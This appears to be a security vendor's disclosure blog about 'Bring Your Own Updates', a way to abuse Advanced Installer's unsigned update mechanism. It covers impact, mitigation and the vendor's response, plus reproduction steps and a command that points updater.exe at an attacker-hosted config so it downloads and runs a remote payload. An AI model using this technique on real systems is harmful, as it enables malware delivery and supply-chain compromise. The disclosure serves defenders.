Bring Your Own Updates (BYOU): Abusing Advanced Installer Updaters for Stealthy Code Execution

Summary

The Howler Cell team has identified a recurring weakness in how Windows applications handle software updates. This technique, which we call Bring Your Own Updates (BYOU), allows attackers to hijack trusted updaters to execute arbitrary code quietly after gaining initial access. Because the binaries are signed, the paths are trusted, and the behavior appears normal; this abuse often evades traditional security controls.

This blog demonstrates how Advanced Installer, an application and deployment tool used by many of the largest organizations in the world, can be leveraged to infect remote computers with malware, potentially leading to a devastating supply-chain attack.

Key Findings

• Howler Cell identified a significant security risk in Advanced Installer v22.7, enabling threat actors to exploit its update mechanism to execute malicious external code if the update packages are not digitally signed. By default, and in common practice, they are not digitally signed.
• The security risk poses a major supply chain risk due to the popularity of Advanced Installer. Customers include Apple, Microsoft, and Motorola, and many more of the largest global companies.
• The exploit pathway, BYOU, lets adversaries run malicious code through legitimate updaters. Commands can bypass EDR (Endpoint Detection & Response) security, antivirus, and application control by leveraging signed binaries.
• Dozens of signed update clients across assessed environments support flexible options such as -url or -config, often pulling files from HTTP endpoints or network shares without integrity checks, enabling malicious packages to be pulled and installed from an attacker’s network infrastructure.
• Any software package created with vulnerable installer frameworks may be affected, making the issue potentially widespread, comparable in scope to supply chain incidents like SolarWinds.
• Howler Cell reported the issue to Advanced Installer. The vendor acknowledged the issue and clarified that enabling “Install only digitally signed update packages signed with the same certificate as the Updater” option would mitigate the risk. It should be noted that by default, digitally signed updates are not enabled, and even Advanced Installer itself does not use them for their own updates. Howler Cell has not comprehensively reviewed how often digital signatures are used with Advanced Installer, but in the sampling of binaries we have tested, digital signatures were not enabled.
• We believe this is not an isolated case. Multiple components in the software supply chain are likely exposed to similar BYOU-style attacks.

Abusing Update Mechanisms In Advanced Installer 

This blog describes an attack pathway impacting Advanced Installer v22.7 (released May 2025) update mechanism to execute arbitrary code execution.

Advanced Installer is an application packaging and deployment tool used to create installation packages (MSI, EXE, MSIX, APPX) for software products. It provides a graphical interface that simplifies building installers without requiring deep knowledge of Windows Installer (MSI) technology. Developers use it to bundle application files, dependencies, registry entries, services, drivers, and configuration settings into a single installer that can be easily deployed and managed across systems. Advanced Installer is used by many of the largest corporations in the world.

Who's Impacted?

Advanced Installer’s customer page shows Apple, Microsoft, Motorola, and many other major organizations, shown in Figure 1, as customers. Organizations that do not use digitally signed updates remain exposed to this type of attack. We cannot confirm which ones fall into this category, but individual testing has demonstrated that the lack of digital signatures is a common practice.

The enforcement of digital signatures for updates is not mandatory when building installers with Advanced Installer. By default, the updater accepts unsigned packages, creating a direct exploitation path.

Who's Vulnerable?

• Any vendor using default settings (no signature enforcement).
• Even Advanced Installer’s own updater is vulnerable; it does not enforce digitally signed updates by default.

Real-World Scenario
Any internal enterprise software built with Advanced Installer inherits this weakness if it is not digitally signed. As the customer list below demonstrates, this is a massive list of potential companies.

Prevalence?
No exact ratio, verifying every vendor’s config is tedious. But defaults win: since signature enforcement is opt-in, most non-hardened deployments are exposed. The fact that Advanced Installer’s own setup skips this mitigation speaks volumes.

Bottom Line: This is a systemic supply chain misconfiguration, not a niche bug. We Recommend auditing all Advanced Installer built updaters and enforcing signed packages in the publication.

Figure 1 Advanced Installer Customers

What's the Impact?

This technique allows arbitrary code execution under the context of the user running the updater. It does not require prior authentication or elevated privileges to trigger. It can be leveraged in post-exploitation scenarios by an insider or threat actor with initial access to:

• Maintain persistence via trusted update channels
• Execute malicious code that may evade EDR or AV because of exclusions tied to the normally trusted update process
• Abuse signed binaries and legitimate tooling to bypass application control mechanisms

Software packages built by Advanced Installer without enforcing digital signature checks will be indirectly exposed to this risk.

The clear concern with this attack is that it could be a vector for a massive supply chain disruption. A supply-chain attack occurs when adversaries compromise a trusted vendor or service—such as a software provider, hardware manufacturer, or cloud platform—to infiltrate their customers. Instead of targeting each organization directly, attackers inject malicious code or components into legitimate updates or products, spreading the compromise widely and stealthily.

These attacks are especially dangerous because they exploit trust and scale: a single poisoned update from a widely used tool (for example, an installer or build tool like Advanced Installer) can silently distribute signed, trusted malware to countless global companies, causing broad data theft, operational outages, regulatory penalties, and severe reputational damage across many sectors.

Technical Analysis 

This malicious technique is achieved via an attacker-controlled update configuration file. The updater binary (updater.exe) accepts remote configuration files without authentication or validation, allowing an attacker to supply a crafted updater config file that includes a reference to a malicious payload. Once the payload is confirmed via the UI, it is downloaded and executed on the target system.

The updater tool (updater.exe) in Advanced Installer accepts a -url parameter that specifies the location of an update configuration file. If this file is hosted remotely and contains valid fields such as payload URL, file size, and checksum, updater.exe will process it.

By crafting a malicious configuration file that references a remote executable payload, an attacker can:

• Trick the updater into presenting the update as legitimate.
• Download and execute arbitrary binaries from an external source.
• Bypass traditional defenses or application controls by abusing the trusted update process.

Steps to Reproduce - Binary Exploitation

• Create a malicious update configuration file (e.g., exploit.txt) shown in Figure 2, that includes:
  • A URL field pointing to a remote payload (e.g., .exe)
  • File size and hash fields that match the malicious file
• Host the configuration file on a remote server
  • Example: remote updater config URL: http://192.168.1.2/exploit.txt
• Execute the following command on a system with Advanced Installer installed.

updater.exe /checknow -url http://192.168.1.2/exploit.txt

Figure 2 Updater config example (exploit.txt)

Proof of Concept Video

Responsible Disclosure From Cyderes

We responsibly disclosed this issue to Advanced Installer. Their team responded promptly and informed us that if signed update channels are used, the issue cannot be exploited. However, at the time of our testing, Advanced Installer’s setup was prone to this exploitation technique, and any software not using signed update channels remains affected.

Back to Top